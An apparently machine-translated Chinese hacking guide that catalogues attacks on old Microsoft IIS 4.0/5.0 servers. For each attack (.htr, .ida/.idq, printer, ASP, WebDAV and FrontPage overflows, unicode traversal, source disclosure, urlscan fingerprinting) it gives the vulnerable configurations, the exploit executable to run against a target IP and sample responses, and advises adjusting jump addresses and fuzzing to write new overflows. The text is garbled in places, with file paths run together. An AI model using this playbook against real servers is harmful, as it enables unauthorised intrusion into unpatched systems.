Common security knowledge: Common iis attack methods

Yuan Ge

1. urlscan recognition. Because some vulnerabilities cannot be used after urlscan is installed, you may need to identify the installed urlscan.
Installed urlscan:
Getiisfile 192.168.5.9 80 "TRACK/" 1
Return Value:
HTTP/1.1 404 Object Not Found
Server: Microsoft-Microsoft IIS/5.1
Date: Mon, 15 Jul 2002 04:50:25 GMT
Connection: close
Content-Type: text/html
Content-Length: 108

<Html> Not Found Urlscan not installed:
Getiisfile 192.168.5.15 80 "TRACK/" 1
Return Value:
HTTP/1.1 200 OK
Server: Microsoft-Microsoft IIS/5.0
Date: Mon, 15 Jul 2002 04:52:10 GMT
Content-Type: message/http
Content-Length: 39

TRACK/aa HTTP/1.1
HOST: 192.168.5.15

2. iis4.0. htr overflow.
Applicability: winnt + iis4.0 + sp5 (<sp5 ).
Use: iisftpdebugiisftp.exe 192.168.5.15 1
The offset value ranges from 0 to 3.

3. overflow of. ida and. idq.
Applicability: no patch is installed For winnt + iis4.0, win2000 + iis5.0.
Program:
Simplified Chinese win2000 + iis5.0 program: idadebugida.exe
Win2000 + iis5.0, win2000 + iis5.0 + sp1 program: ida2debugida.exe
For winnt + iis4.0, you need to adjust the jump instruction address.

4. printer overflow.
Applicability: no patch is installed for win2000 + iis5.0.
Program: ippdebugipp.exe
You may need to adjust the jump instruction address for sp2.

5. unicode and decode vulnerabilities.
Applicability: winnt + iis4.0, win2000 + iis5.0
Program: iisfiledebuggetiisfile2.exe
Or enter it in the browser.

6. frontpage2000 extended Overflow Vulnerability.
Applicability: Microsoft FrontPage 2000 Server Extensions + IIS4.0IIS5.0
Program: fp30regdebugfp30.exe

7. dvwssr. dll Overflow.
Applicability: Microsoft FrontPage 98 Server Extensions + IIS4.0IIS5.0
Program: dvwssrdebugdvwssr.exe

8. asp overflow.
Applicability: winnt + iis4.0, win2000 + iis5.0, winxp + iis5.1, no security notice (MS02-018) patch
Program:
1. File overflow;
Program:
Win2000 + iis5.0: aspdebugasp.exe
Simplified Chinese winnt + iis4.0: asalldebugasp.exe
You must provide an asp file path on the server. This asp file must contain the include or mappath statement and use the relative path.
Ii. overflow of block encoding;
Program:
Win2000 + iis5.0: aspcodedebugaspcode.exe
Aspcode2debugaspcode.exe
Aspcode3debugaspcode.exe
You can use 1 or 3. 3.

In other versions of the system, you need to adjust the jump command address.
 
9. perlis. dll Overflow.
Applicability: IIS4.0IIS5.0 + perlis. dll ing. cgi or. pl
Program: perlisdebugperlis.exe
In actual use, you may need to modify the virtual directory of the sending String Based on the mapped virtual directory, and adjust the offset according to the mapped file name.

10. Some counters overflow.
Counter Search Method: 1 second search for the original file in the main page, such as .exe,. dll,. cgi,. pl, etc., 2. Access/cgi-bin/,/count/,/counter, and view the returned information.
Program: counterDebugcounover.exe
If no overflow is found, you can use the iisgetfile method in "? "Change the variable String Length to send packets, and observe the returned information to determine the overflow. You can also search for a free version based on the returned information and copyright information, and then test the version to write a suitable overflow program.

11. webdav overflow.
Applicability: win2000 + iis5.0. urlscan is not installed, and no permission restriction is imposed on httpext. dll. No Patches have been released.
Program:
Simplified Chinese: win2000 + iis5.0: webdavdebugwebdav.exe
Traditional Chinese win2000 + iis5.0: webdavtwdebugwebdav.exe
Non-Far East version win2000 + iis5.0: webdavendebugwebdav.exe

12. webdav exposes the original file.
Applicability: win2000 + iis5.0
Program: getiisfile.exe
Example: getiisfile 192.168.5.9 80 "GET/default. asp" 65535 a tf